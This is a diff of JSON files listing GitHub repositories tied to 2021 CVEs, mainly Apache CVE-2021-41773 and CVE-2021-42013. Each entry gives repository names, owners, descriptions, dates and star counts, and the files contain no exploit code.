"https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-L-", + "description": null, + "fork": false, + "created_at": "2022-09-15T10:08:36Z", + "updated_at": "2022-09-15T10:08:51Z", + "pushed_at": "2022-09-15T10:08:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536985771, + "name": "CVE-2021-41773-PoC", + "full_name": "mightysai1997\/CVE-2021-41773-PoC", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-PoC", + "description": null, + "fork": false, + "created_at": "2022-09-15T11:01:45Z", + "updated_at": "2022-09-15T11:02:07Z", + "pushed_at": "2024-09-29T01:26:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537018809, + "name": "CVE-2021-41773.git1", + "full_name": "mightysai1997\/CVE-2021-41773.git1", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773.git1", + "description": null, + "fork": false, + "created_at": "2022-09-15T12:35:06Z", + "updated_at": "2022-09-15T12:35:18Z", + "pushed_at": "2022-09-15T12:35:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537019898, + "name": "CVE-2021-41773m", + "full_name": "mightysai1997\/CVE-2021-41773m", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773m", + "description": null, + "fork": false, + "created_at": "2022-09-15T12:37:59Z", + "updated_at": "2022-09-16T01:01:18Z", + "pushed_at": "2022-09-15T12:38:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537060189, + "name": "CVE-2021-41773S", + "full_name": "mightysai1997\/CVE-2021-41773S", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773S", + "description": null, + "fork": false, + "created_at": "2022-09-15T14:17:45Z", + "updated_at": "2022-09-16T01:01:16Z", + "pushed_at": "2024-10-24T18:33:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538798099, + "name": "LayarKacaSiber-CVE-2021-41773", + "full_name": "dileepdkumar\/LayarKacaSiber-CVE-2021-41773", + "owner": { + "login": "dileepdkumar", + "id": 89115244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4", + "html_url": "https:\/\/github.com\/dileepdkumar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dileepdkumar\/LayarKacaSiber-CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-09-20T03:45:24Z", + "updated_at": "2022-09-20T03:45:37Z", + "pushed_at": "2024-09-28T12:11:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560281575, + "name": "CVE-2021-41773", + "full_name": "aqiao-jashell\/CVE-2021-41773", + "owner": { + "login": "aqiao-jashell", + "id": 94209165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94209165?v=4", + "html_url": "https:\/\/github.com\/aqiao-jashell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqiao-jashell\/CVE-2021-41773", + "description": "apache路径穿越漏洞poc&exp", + "fork": false, + "created_at": "2022-11-01T05:58:59Z", + "updated_at": "2024-06-14T09:26:51Z", + "pushed_at": "2023-05-25T01:03:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560339513, + "name": "py-CVE-2021-41773", + "full_name": "aqiao-jashell\/py-CVE-2021-41773", + "owner": { + "login": "aqiao-jashell", + "id": 94209165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94209165?v=4", + "html_url": "https:\/\/github.com\/aqiao-jashell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqiao-jashell\/py-CVE-2021-41773", + "description": "python编写的apache路径穿越poc&exp", + "fork": false, + "created_at": "2022-11-01T09:17:03Z", + "updated_at": "2023-02-06T08:31:07Z", + "pushed_at": "2022-11-02T09:26:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 567720828, + "name": "CVE-2021-41773", + "full_name": "12345qwert123456\/CVE-2021-41773", + "owner": { + "login": "12345qwert123456", + "id": 63474188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4", + "html_url": "https:\/\/github.com\/12345qwert123456", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/12345qwert123456\/CVE-2021-41773", + "description": "Vulnerable configuration Apache HTTP Server version 2.4.49", + "fork": false, + "created_at": "2022-11-18T12:23:04Z", + "updated_at": "2022-11-21T16:25:14Z", + "pushed_at": "2022-11-21T16:20:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-2021-41773", + "docker", + "http-server", + "lfi", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 569296799, + "name": "Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution", + "full_name": "blackn0te\/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution", + "owner": { + "login": "blackn0te", + "id": 33929865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33929865?v=4", + "html_url": "https:\/\/github.com\/blackn0te", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackn0te\/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution", + "description": "Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)", + "fork": false, + "created_at": "2022-11-22T14:09:18Z", + "updated_at": "2024-10-21T18:56:21Z", + "pushed_at": "2022-11-22T14:42:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 574682128, + "name": "exploit-apache2-cve-2021-41773", + "full_name": "TheKernelPanic\/exploit-apache2-cve-2021-41773", + "owner": { + "login": "TheKernelPanic", + "id": 78765297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78765297?v=4", + "html_url": "https:\/\/github.com\/TheKernelPanic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheKernelPanic\/exploit-apache2-cve-2021-41773", + "description": "Exploit for path transversal vulnerability in apache", + "fork": false, + "created_at": "2022-12-05T21:11:28Z", + "updated_at": "2024-07-27T17:23:49Z", + "pushed_at": "2022-12-05T21:13:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603146964, + "name": "apache2.4.49VulnerableLabSetup", + "full_name": "retrymp3\/apache2.4.49VulnerableLabSetup", + "owner": { + "login": "retrymp3", + "id": 65720815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65720815?v=4", + "html_url": "https:\/\/github.com\/retrymp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retrymp3\/apache2.4.49VulnerableLabSetup", + "description": "CVE-2021-41773 vulnerable apache version 2.4.49 lab set-up.", + "fork": false, + "created_at": "2023-02-17T18:03:23Z", + "updated_at": "2023-02-17T18:05:53Z", + "pushed_at": "2023-02-18T05:51:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630673981, + "name": "docker-cve-2021-41773", + "full_name": "MatanelGordon\/docker-cve-2021-41773", + "owner": { + "login": "MatanelGordon", + "id": 72258277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72258277?v=4", + "html_url": "https:\/\/github.com\/MatanelGordon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MatanelGordon\/docker-cve-2021-41773", + "description": "A little demonstration of cve-2021-41773 on httpd docker containers", + "fork": false, + "created_at": "2023-04-20T22:37:06Z", + "updated_at": "2023-04-27T10:44:37Z", + "pushed_at": "2023-04-21T18:36:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41773", + "docker" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649140370, + "name": "Apache-CVEs", + "full_name": "0xGabe\/Apache-CVEs", + "owner": { + "login": "0xGabe", + "id": 68028935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xGabe\/Apache-CVEs", + "description": "Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)", + "fork": false, + "created_at": "2023-06-03T22:59:20Z", + "updated_at": "2023-06-04T02:56:40Z", + "pushed_at": "2023-06-03T23:12:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673733144, + "name": "CVE-2021-41773_CVE-2021-42013_Exploits", + "full_name": "OfriOuzan\/CVE-2021-41773_CVE-2021-42013_Exploits", + "owner": { + "login": "OfriOuzan", + "id": 104366208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104366208?v=4", + "html_url": "https:\/\/github.com\/OfriOuzan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OfriOuzan\/CVE-2021-41773_CVE-2021-42013_Exploits", + "description": "Exploit CVE-2021-41773 and CVE-2021-42013", + "fork": false, + "created_at": "2023-08-02T09:50:10Z", + "updated_at": "2023-11-10T19:10:30Z", + "pushed_at": "2023-08-02T09:51:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 677373693, + "name": "CVE-2021-41773-MSF", + "full_name": "belajarqywok\/CVE-2021-41773-MSF", + "owner": { + "login": "belajarqywok", + "id": 59132829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59132829?v=4", + "html_url": "https:\/\/github.com\/belajarqywok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/belajarqywok\/CVE-2021-41773-MSF", + "description": "Simple Metasploit-Framework module for conducting website penetration tests (CVE-2021-41773).", + "fork": false, + "created_at": "2023-08-11T12:12:09Z", + "updated_at": "2023-10-02T04:03:33Z", + "pushed_at": "2023-08-11T12:14:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "metasploit-framework", + "metasploit-modules", + "penetration-testing", + "research", + "security-automation", + "testing" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721073490, + "name": "CVE-2021-41773", + "full_name": "Iris288\/CVE-2021-41773", + "owner": { + "login": "Iris288", + "id": 101178777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101178777?v=4", + "html_url": "https:\/\/github.com\/Iris288", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Iris288\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2023-11-20T09:57:07Z", + "updated_at": "2023-11-20T13:51:44Z", + "pushed_at": "2023-11-20T10:42:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809527050, + "name": "CVE-2021-41773", + "full_name": "Maybe4a6f7365\/CVE-2021-41773", + "owner": { + "login": "Maybe4a6f7365", + "id": 87483432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87483432?v=4", + "html_url": "https:\/\/github.com\/Maybe4a6f7365", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maybe4a6f7365\/CVE-2021-41773", + "description": "CVE-2021-41773.py", + "fork": false, + "created_at": "2024-06-02T23:43:35Z", + "updated_at": "2024-06-03T00:03:13Z", + "pushed_at": "2024-06-03T00:03:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847507185, + "name": "Apache-HTTP-Server-2.4.50-RCE", + "full_name": "Zyx2440\/Apache-HTTP-Server-2.4.50-RCE", + "owner": { + "login": "Zyx2440", + "id": 178906552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178906552?v=4", + "html_url": "https:\/\/github.com\/Zyx2440", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zyx2440\/Apache-HTTP-Server-2.4.50-RCE", + "description": "Apache-HTTP-Server-2.4.50-RCE This tool is designed to test Apache servers for the CVE-2021-41773 \/ CVE-2021-42013 vulnerability. It is intended for educational purposes only and should be used responsibly on systems you have explicit permission to test.", + "fork": false, + "created_at": "2024-08-26T01:54:06Z", + "updated_at": "2024-08-27T12:54:48Z", + "pushed_at": "2024-08-26T16:32:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache2", + "check-version", + "cve-2021-41773", + "cve-2021-41773-poc", + "cve-2021-42013", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 847643436, + "name": "CVE-2021-41773", + "full_name": "0xc4t\/CVE-2021-41773", + "owner": { + "login": "0xc4t", + "id": 105418279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4", + "html_url": "https:\/\/github.com\/0xc4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc4t\/CVE-2021-41773", + "description": "POC & Lab For CVE-2021-41773", + "fork": false, + "created_at": "2024-08-26T09:07:33Z", + "updated_at": "2024-08-27T11:37:07Z", + "pushed_at": "2024-08-27T11:37:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848546482, + "name": "Additive-Vulnerability-Analysis-CVE-2021-41773", + "full_name": "jkska23\/Additive-Vulnerability-Analysis-CVE-2021-41773", + "owner": { + "login": "jkska23", + "id": 51857894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51857894?v=4", + "html_url": "https:\/\/github.com\/jkska23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jkska23\/Additive-Vulnerability-Analysis-CVE-2021-41773", + "description": "Apache: a Mainstream Web Service Turned a Vector of Attack for Remote Code Execution", + "fork": false, + "created_at": "2024-08-28T00:49:09Z", + "updated_at": "2024-08-28T00:54:26Z", + "pushed_at": "2024-08-28T00:54:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41784.json b/2021/CVE-2021-41784.json new file mode 100644 index 0000000000..3a427e53b5 --- /dev/null +++ b/2021/CVE-2021-41784.json @@ -0,0 +1,33 @@ +[ + { + "id": 419148076, + "name": "CVE-2021-41784", + "full_name": "Jeromeyoung\/CVE-2021-41784", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-41784", + "description": "CVE-2021-41773 Docker lab", + "fork": false, + "created_at": "2021-10-20T01:40:53Z", + "updated_at": "2023-01-25T05:12:20Z", + "pushed_at": "2021-10-20T01:21:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41805.json b/2021/CVE-2021-41805.json new file mode 100644 index 0000000000..743e3436b6 --- /dev/null +++ b/2021/CVE-2021-41805.json @@ -0,0 +1,33 @@ +[ + { + "id": 575363965, + "name": "CVE-2021-41805", + "full_name": "blackm4c\/CVE-2021-41805", + "owner": { + "login": "blackm4c", + "id": 78611909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78611909?v=4", + "html_url": "https:\/\/github.com\/blackm4c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackm4c\/CVE-2021-41805", + "description": "HashiCorp Consul exploit with python. (CVE-2021-41805)", + "fork": false, + "created_at": "2022-12-07T10:50:17Z", + "updated_at": "2022-12-08T02:19:59Z", + "pushed_at": "2022-12-07T10:56:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41822.json b/2021/CVE-2021-41822.json new file mode 100644 index 0000000000..156a409f07 --- /dev/null +++ b/2021/CVE-2021-41822.json @@ -0,0 +1,33 @@ +[ + { + "id": 411250558, + "name": "CVE-2021-41822", + "full_name": "badboycxcc\/CVE-2021-41822", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-41822", + "description": "个人CVE", + "fork": false, + "created_at": "2021-09-28T11:17:41Z", + "updated_at": "2021-11-03T03:53:59Z", + "pushed_at": "2021-10-20T10:15:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4191.json b/2021/CVE-2021-4191.json new file mode 100644 index 0000000000..49817cbc90 --- /dev/null +++ b/2021/CVE-2021-4191.json @@ -0,0 +1,72 @@ +[ + { + "id": 649522285, + "name": "CVE-2021-4191_Exploits", + "full_name": "Adelittle\/CVE-2021-4191_Exploits", + "owner": { + "login": "Adelittle", + "id": 58516494, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58516494?v=4", + "html_url": "https:\/\/github.com\/Adelittle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Adelittle\/CVE-2021-4191_Exploits", + "description": null, + "fork": false, + "created_at": "2023-06-05T04:08:45Z", + "updated_at": "2024-08-12T20:31:36Z", + "pushed_at": "2023-06-05T04:11:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669611759, + "name": "CVE-2021-4191-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2021-4191-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-4191-EXPLOIT", + "description": "A PoC exploit for CVE-2021-4191 - GitLab User Enumeration.", + "fork": false, + "created_at": "2023-07-22T21:06:51Z", + "updated_at": "2024-07-12T03:11:26Z", + "pushed_at": "2023-08-09T10:41:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "api", + "cve-2021-4191", + "exploit", + "exploitation", + "gitlab", + "graphql", + "user-enumeration" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41946.json b/2021/CVE-2021-41946.json new file mode 100644 index 0000000000..72142e31e5 --- /dev/null +++ b/2021/CVE-2021-41946.json @@ -0,0 +1,33 @@ +[ + { + "id": 493307734, + "name": "CVE-2021-41946", + "full_name": "afaq1337\/CVE-2021-41946", + "owner": { + "login": "afaq1337", + "id": 45089292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4", + "html_url": "https:\/\/github.com\/afaq1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afaq1337\/CVE-2021-41946", + "description": null, + "fork": false, + "created_at": "2022-05-17T15:23:12Z", + "updated_at": "2022-05-17T15:23:12Z", + "pushed_at": "2023-12-31T06:40:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41962.json b/2021/CVE-2021-41962.json new file mode 100644 index 0000000000..78f5dd074a --- /dev/null +++ b/2021/CVE-2021-41962.json @@ -0,0 +1,33 @@ +[ + { + "id": 438955513, + "name": "-CVE-2021-41962", + "full_name": "lohyt\/-CVE-2021-41962", + "owner": { + "login": "lohyt", + "id": 11375930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11375930?v=4", + "html_url": "https:\/\/github.com\/lohyt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lohyt\/-CVE-2021-41962", + "description": "Stored XSS found in Vehicle Service Management System 1.0 application in Sourcecodester.", + "fork": false, + "created_at": "2021-12-16T10:52:13Z", + "updated_at": "2021-12-16T10:59:21Z", + "pushed_at": "2021-12-16T10:59:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42008.json b/2021/CVE-2021-42008.json new file mode 100644 index 0000000000..f600df4186 --- /dev/null +++ b/2021/CVE-2021-42008.json @@ -0,0 +1,64 @@ +[ + { + "id": 434603103, + "name": "CVE-2021-42008", + "full_name": "numanturle\/CVE-2021-42008", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-42008", + "description": "Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver", + "fork": false, + "created_at": "2021-12-03T13:18:32Z", + "updated_at": "2024-08-12T20:18:33Z", + "pushed_at": "2021-12-03T13:19:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 434618356, + "name": "CVE-2021-42008", + "full_name": "0xdevil\/CVE-2021-42008", + "owner": { + "login": "0xdevil", + "id": 52781556, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781556?v=4", + "html_url": "https:\/\/github.com\/0xdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xdevil\/CVE-2021-42008", + "description": "CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver", + "fork": false, + "created_at": "2021-12-03T14:08:26Z", + "updated_at": "2024-08-12T20:18:33Z", + "pushed_at": "2022-05-01T15:02:44Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42013.json b/2021/CVE-2021-42013.json new file mode 100644 index 0000000000..f8663dd156 --- /dev/null +++ b/2021/CVE-2021-42013.json @@ -0,0 +1,870 @@ +[ + { + "id": 414715774, + "name": "apache-exploit-CVE-2021-42013", + "full_name": "andrea-mattioli\/apache-exploit-CVE-2021-42013", + "owner": { + "login": "andrea-mattioli", + "id": 5707570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5707570?v=4", + "html_url": "https:\/\/github.com\/andrea-mattioli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andrea-mattioli\/apache-exploit-CVE-2021-42013", + "description": "Exploit with integrated shodan search", + "fork": false, + "created_at": "2021-10-07T18:31:29Z", + "updated_at": "2022-09-21T11:39:27Z", + "pushed_at": "2021-10-08T13:18:55Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414860866, + "name": "cve-2021-42013", + "full_name": "Vulnmachines\/cve-2021-42013", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/cve-2021-42013", + "description": "Apache 2.4.50 Path traversal vulnerability", + "fork": false, + "created_at": "2021-10-08T05:44:54Z", + "updated_at": 